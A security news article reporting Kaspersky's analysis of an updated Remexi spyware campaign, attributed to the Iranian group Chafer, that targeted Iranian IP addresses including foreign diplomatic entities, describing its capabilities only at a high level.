Threat Management, Threat Management, Threat Intelligence, Malware

Researchers: Remexi spyware campaign targeted diplomatic institutions based in Iran

A cyberespionage campaign targeted Iranian IP addresses late last year, with the goal of infecting victims with an updated version of Remexi backdoor malware, researchers have reported. Some of these IP addresses belong to foreign diplomatic entities located within Iran's borders.

Remexi is typically associated with a reputed Iranian APT group known as Chafer. Its use in the 2018 campaign suggests that Iranian actors may have executed a domestic espionage operation against entities within its own borders, researchers with Kaspersky Lab are reporting.

Kaspersky originally analyzed the threat back in autumn of 2018, before privately sharing an intelligence report with its customers in November. But today Kaspersky publicly shared its findings in a blog post authored by Denis Legezo, security researcher with the company's Global Research and Analysis Team (GReAT).

Although Remexi originally dates back to at least 2015, the version Kaspersky analyzed had a March 2018 compilation time stamp. According to Kaspersky, Remexi's spyware capabilities include capturing keystrokes, screenshots, credentials, and browser data such as cookies and history, and then communicating this data to the attackers.

Moreover, "the attackers rely heavily on Microsoft technologies on both the client and server sides," Legezo writes. "The Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data," and the C&C architecture "is based on IIS using .asp technology to handle the victims' HTTP requests."

Kaspersky found no conclusive evidence pointing to how Remexi was spread. However, in one instance of infection, researchers were able to establish a connection between Remexi and an AutoIT script compiled as a PE file. Kaspersky believes this executable may have been a dropper that used an FTP with hard-coded credentials to receive the Remexi payload.

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.